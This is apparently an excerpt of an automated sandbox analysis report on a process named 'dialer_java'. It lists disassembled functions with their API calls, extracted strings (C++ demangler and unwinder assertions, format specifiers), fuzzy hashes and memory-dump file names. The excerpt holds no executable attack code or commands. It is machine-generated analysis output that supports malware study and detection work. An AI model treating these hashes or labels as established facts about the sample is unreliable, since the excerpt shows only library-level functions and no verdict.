Instruction ID: 47aecb54895dc2c736bd86f7a756e7eec8339ef04b985cacdcbc7ff5298d1a0f
Opcode Fuzzy Hash: ce501ce98fd795f4a36eda83ed67996a915afdf4059a98f1c7426f5b765f9e9f
Instruction Fuzzy Hash: 70A1D3B3B05B8182EF298F1AE4913ADA7A1EB58BC4F048131DB8D577A4EF3DD4918305

Function 00007FF6E3A66830 Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 239COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6E3A66952
memset.MSVCRT ref: 00007FF6E3A669E3
fputwc.MSVCRT ref: 00007FF6E3A66A5E
fputwc.MSVCRT ref: 00007FF6E3A66ABE
fputwc.MSVCRT ref: 00007FF6E3A66B1E

Strings

o, xrefs: 00007FF6E3A66B3D
o, xrefs: 00007FF6E3A66963
o, xrefs: 00007FF6E3A66892
o, xrefs: 00007FF6E3A669F5
o, xrefs: 00007FF6E3A66844
o, xrefs: 00007FF6E3A6699E

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: fputwc$memset
String ID: o$o$o$o$o$o
API String ID: 822753988-2858737866
Opcode ID: ec0378b7f33f77d8e7c97258e2461193ec11778b80df3b520114259e277ecf23
Instruction ID: 66f988cbf989770fc3374fedf5eb0b68cb0fafe7d885b9b19799963bfb6b7fe8
Opcode Fuzzy Hash: ec0378b7f33f77d8e7c97258e2461193ec11778b80df3b520114259e277ecf23
Instruction Fuzzy Hash: 909138A3F2424286F3354E1E95467397EE1AB24784F019234CF6AE76E1DE3EE8C18705

Function 00007FF6E3A7C560 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A7C5D6
realloc.MSVCRT ref: 00007FF6E3A7C67B
realloc.MSVCRT ref: 00007FF6E3A7C6D7
realloc.MSVCRT ref: 00007FF6E3A7C744
realloc.MSVCRT ref: 00007FF6E3A7C79F
realloc.MSVCRT ref: 00007FF6E3A7C7FF
realloc.MSVCRT ref: 00007FF6E3A7C86A
realloc.MSVCRT ref: 00007FF6E3A7C8B8

Strings

volatil, xrefs: 00007FF6E3A7C7B4
restric, xrefs: 00007FF6E3A7C814

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: restric$ volatil
API String ID: 471065373-3617781792
Opcode ID: db856f784eeb75ae2a2894c94dec506f6a3f145af6371b9ba82dd0594c7acb52
Instruction ID: 33bf4cc35ee2ee4a9f0aedce820314503a22c364bd51d5b9f74cba2a1ca46376
Opcode Fuzzy Hash: db856f784eeb75ae2a2894c94dec506f6a3f145af6371b9ba82dd0594c7acb52
Instruction Fuzzy Hash: 06B194B7B06B8682DE298F5AE58536D7761EB54BC0F008531CB8E977A4EF2DE481C305

Function 00007FF6E3A7FED0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 187COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A7FF80
malloc.MSVCRT ref: 00007FF6E3A7FF9A
memcpy.MSVCRT ref: 00007FF6E3A7FFB9
free.MSVCRT ref: 00007FF6E3A80040
_assert.MSVCRT ref: 00007FF6E3A8006B
free.MSVCRT ref: 00007FF6E3A80085
realloc.MSVCRT ref: 00007FF6E3A800F7
memcpy.MSVCRT ref: 00007FF6E3A80111

Strings

Index < size() && "Invalid access!", xrefs: 00007FF6E3A80057
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A8005E

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: freememcpyrealloc$_assertmalloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Index < size() && "Invalid access!"
API String ID: 3641880838-4289452498
Opcode ID: 14559c1bef0205f1bddb7d762293130f666c23255001db772909319ea83ab9bc
Instruction ID: 736eb1d2218bd780c407cb67fbef5e28c500ebb277d10965cd38ce307100b0f4
Opcode Fuzzy Hash: 14559c1bef0205f1bddb7d762293130f666c23255001db772909319ea83ab9bc
Instruction Fuzzy Hash: 5D51CD63B19A8182EA20DB09E84537DABA0FB98BC4F144131EE8D93BA5DF3DD5C1C305

Function 00007FF6E3A714B4 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 171COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A715B8
memcpy.MSVCRT ref: 00007FF6E3A715D7
realloc.MSVCRT ref: 00007FF6E3A719E9
_assert.MSVCRT ref: 00007FF6E3A71E69

Strings

starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6E3A71E55
_, xrefs: 00007FF6E3A7198D
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A71E5C

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: _assertmallocmemcpyrealloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$_$starts_with(Res, "operator") && "operator name does not start with 'operator'"
API String ID: 2036919697-1558868925
Opcode ID: 679a2847ca810ef046ab7b588b6ce72a6a5788b1c42471ad5ebca2e9f2d48802
Instruction ID: 98257d416c217b15665d053e62b954f3c439b2fbca8d7665b891b90697d2c019
Opcode Fuzzy Hash: 679a2847ca810ef046ab7b588b6ce72a6a5788b1c42471ad5ebca2e9f2d48802
Instruction Fuzzy Hash: 9061B033719B4682EA70DB19E4863BA6BE5EB44780F440035CB8E97B95DF3DE185C34A

Function 00007FF6E3A76D70 Relevance: 16.8, APIs: 11, Instructions: 256COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A76DA1
realloc.MSVCRT ref: 00007FF6E3A76E7B
realloc.MSVCRT ref: 00007FF6E3A76ED5
memcpy.MSVCRT ref: 00007FF6E3A76EF3
realloc.MSVCRT ref: 00007FF6E3A76F2E
realloc.MSVCRT ref: 00007FF6E3A76F8D
realloc.MSVCRT ref: 00007FF6E3A76FE9
realloc.MSVCRT ref: 00007FF6E3A7703E
memcpy.MSVCRT ref: 00007FF6E3A7705B
realloc.MSVCRT ref: 00007FF6E3A770A2
memcpy.MSVCRT ref: 00007FF6E3A770BC

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc$memcpy$malloc
String ID:
API String ID: 774493741-0
Opcode ID: 81f55bab3f375e8d77c0eab75715e2722c19bbdd34e8aaf7ba5827377f0e3e99
Instruction ID: 7cd01e5d8c93b3e576fa1c8e260ff398ef3518a8763863f279ce4976a606e7db
Opcode Fuzzy Hash: 81f55bab3f375e8d77c0eab75715e2722c19bbdd34e8aaf7ba5827377f0e3e99
Instruction Fuzzy Hash: B7A19FB3B05B8282EA25CF19E4853B9A7A5EB547C0F048531CF9D577A5EF3EE4928304

Function 00007FF6E3A79150 Relevance: 16.7, APIs: 11, Instructions: 246COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A79198
realloc.MSVCRT ref: 00007FF6E3A79220
realloc.MSVCRT ref: 00007FF6E3A79279
memcpy.MSVCRT ref: 00007FF6E3A79297
realloc.MSVCRT ref: 00007FF6E3A792CF
realloc.MSVCRT ref: 00007FF6E3A7931B
realloc.MSVCRT ref: 00007FF6E3A79380
realloc.MSVCRT ref: 00007FF6E3A793D9
memcpy.MSVCRT ref: 00007FF6E3A793F7
realloc.MSVCRT ref: 00007FF6E3A7942F
realloc.MSVCRT ref: 00007FF6E3A794A2

Part of subcall function 00007FF6E3A74F60: realloc.MSVCRT ref: 00007FF6E3A74FED
Part of subcall function 00007FF6E3A74F60: realloc.MSVCRT ref: 00007FF6E3A7506D

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: 91c14e38613bf2ef24675708493fc072fa46aa459f950d142766af95f801b6d9
Instruction ID: 408032a0d1000fa176f4fecf1984e0b5761dd8b02033f52a8ebe7da9341cd56d
Opcode Fuzzy Hash: 91c14e38613bf2ef24675708493fc072fa46aa459f950d142766af95f801b6d9
Instruction Fuzzy Hash: 76A181B3B05B8282EA398F4AF495379A7A1EB547C0F048536CB8E577D5EF3DE0918205

Function 00007FF6E3A67780 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 412COMMON

Download Yara Rule

Strings

., xrefs: 00007FF6E3A678F4

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 404f2b5ef2ef1ca89c18a83dc03043f38f12fb85a76960961c0867d0112dc419
Instruction ID: c611f1e4dd199ede0ab2d05a464c72f075852f6f375ce8707af284827adfa6e1
Opcode Fuzzy Hash: 404f2b5ef2ef1ca89c18a83dc03043f38f12fb85a76960961c0867d0112dc419
Instruction Fuzzy Hash: A3024173B3924287E7748A1EE45273A7BA1EB54740F005139DB9B96A81DF2FE9C0C709

Function 00007FF6E3A821E0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 391COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00007FF6E3A82439

Strings

., xrefs: 00007FF6E3A82354

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: fputc
String ID: .
API String ID: 1992160199-248832578
Opcode ID: 787fcf644351c96b12129b903d4882cc17bbf885cf22506cf1a7f1494b5e88d3
Instruction ID: 3de62886d2fa96c97cd219b09e5f199e263d822583b7b3269fee9cbce8672005
Opcode Fuzzy Hash: 787fcf644351c96b12129b903d4882cc17bbf885cf22506cf1a7f1494b5e88d3
Instruction Fuzzy Hash: D9F17573B092C687F7788A19E15A77E7B92EB14740F004135CB9E96A81DF2EF481C71A

Function 00007FF6E3A6CEA0 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A6CFA9

Strings

struct, xrefs: 00007FF6E3A6CEA2
string literal, xrefs: 00007FF6E3A6D033

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: string literal$struct
API String ID: 471065373-3644149429
Opcode ID: edf70fb810bf94ab848eb3daabb1ff00f60fb926d8302909fc9aec54d1f694de
Instruction ID: d4da2ec0ac50ab083998c65aa112e452ee772723192ebf642ebfcf579f7b3323
Opcode Fuzzy Hash: edf70fb810bf94ab848eb3daabb1ff00f60fb926d8302909fc9aec54d1f694de
Instruction Fuzzy Hash: 34D1EF73B2AB8245EA658B1DA4523B97BD1AF047C0F044531CB9E97B81DF3EE4C1830A

Function 00007FF6E3A71129 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A711E6
memcpy.MSVCRT ref: 00007FF6E3A71207

Strings

starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6E3A71E55
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A71E5C

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: mallocmemcpy
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
API String ID: 4276657696-3503049562
Opcode ID: d973416b99985d58f68cdca0b67b1622ab5263c660939956c0e26541a716c251
Instruction ID: 4bdc5bf315088304cef6b9371002479283016a7ed2b4b11b7b4f51d233f192c3
Opcode Fuzzy Hash: d973416b99985d58f68cdca0b67b1622ab5263c660939956c0e26541a716c251
Instruction Fuzzy Hash: 95718F33719B8282EA61DB19F4823BA6BA4FB44780F444035DB8D97B95EF3DE084C349

Function 00007FF6E3A662B0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 159stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF6E3A66377
fputwc.MSVCRT ref: 00007FF6E3A663E3
fwprintf.MSVCRT ref: 00007FF6E3A664AD
fwprintf.MSVCRT ref: 00007FF6E3A664C7

Strings

%-*.*S, xrefs: 00007FF6E3A664BD
%*.*S, xrefs: 00007FF6E3A66303
%.*S, xrefs: 00007FF6E3A664A0

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: fwprintf$fputwcstrlen
String ID: %*.*S$%-*.*S$%.*S
API String ID: 3854221471-2115465065
Opcode ID: 98557c05d587b3aa904965f6ccec36304c4a609c4168c198159b4ee53df767b9
Instruction ID: 4be5fd3d5a4604238b04ab9348e77bc660084df44cb697a2e9963dab82df00d0
Opcode Fuzzy Hash: 98557c05d587b3aa904965f6ccec36304c4a609c4168c198159b4ee53df767b9
Instruction Fuzzy Hash: 0C5172B3B2864287E7748F0EE15573A7BA0EB94B50F014135DB5ED76A0DE3EE8818B05

Function 00007FF6E3A64810 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 93COMMON

Download Yara Rule

APIs

fflush.MSVCRT ref: 00007FF6E3A6484A
abort.MSVCRT ref: 00007FF6E3A6484F
fflush.MSVCRT ref: 00007FF6E3A6489A
abort.MSVCRT ref: 00007FF6E3A6489F
RtlVirtualUnwind.KERNEL32 ref: 00007FF6E3A64904

Strings

setFloatReg, xrefs: 00007FF6E3A6487A
libunwind: %s - %s, xrefs: 00007FF6E3A64823, 00007FF6E3A64873
float registers unimplemented, xrefs: 00007FF6E3A64831, 00007FF6E3A64881
getFloatReg, xrefs: 00007FF6E3A6482A

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: abortfflush$UnwindVirtual
String ID: float registers unimplemented$getFloatReg$libunwind: %s - %s$setFloatReg
API String ID: 3704712045-981669299
Opcode ID: c81ff4b8b519b7b76abbc2ebb3b43e5cc1aa211c4902d7b55f271be843bc12e9
Instruction ID: f442c5e448b358199035f5343901968c35a32f1691f7b4f46840afdb149a8378
Opcode Fuzzy Hash: c81ff4b8b519b7b76abbc2ebb3b43e5cc1aa211c4902d7b55f271be843bc12e9
Instruction Fuzzy Hash: A631CC73B15B9681E714EB6DF44A3B93B65EB44784F00403ADA4EA3791CE3ED582C305

Function 00007FF6E3A660C0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

fputwc.MSVCRT ref: 00007FF6E3A66195
fwprintf.MSVCRT ref: 00007FF6E3A66277

Strings

%.*s, xrefs: 00007FF6E3A66250
%s , xrefs: 00007FF6E3A660C1, 00007FF6E3A660C2
%-*.*s, xrefs: 00007FF6E3A6626D
%*.*s, xrefs: 00007FF6E3A6610D

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: fputwcfwprintf
String ID: %*.*s$%-*.*s$%.*s$%s
API String ID: 3232229890-407542676
Opcode ID: 6e15c573cd0727096df9284b745dfe6214acec5976200213ec216c7e21dcd879
Instruction ID: bd9ed510e85daab7e04dbc231cf832698fc643839c1db50cafdb71b0d85a4fee
Opcode Fuzzy Hash: 6e15c573cd0727096df9284b745dfe6214acec5976200213ec216c7e21dcd879
Instruction Fuzzy Hash: 0E5155B3F2450287E7788E1EE45273A7BA1EB44750B114139DB9ED76A1DE3EE8808B05

Function 00007FF6E3A780F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 133COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF6E3A78153
realloc.MSVCRT ref: 00007FF6E3A781A9
realloc.MSVCRT ref: 00007FF6E3A7820D
memcpy.MSVCRT ref: 00007FF6E3A78227
realloc.MSVCRT ref: 00007FF6E3A7825F

Strings

'unnamed, xrefs: 00007FF6E3A781BE
Parser->TemplateParams.size() >= OldNumTemplateParamLists, xrefs: 00007FF6E3A7813F
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A78146

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc$_assertmemcpy
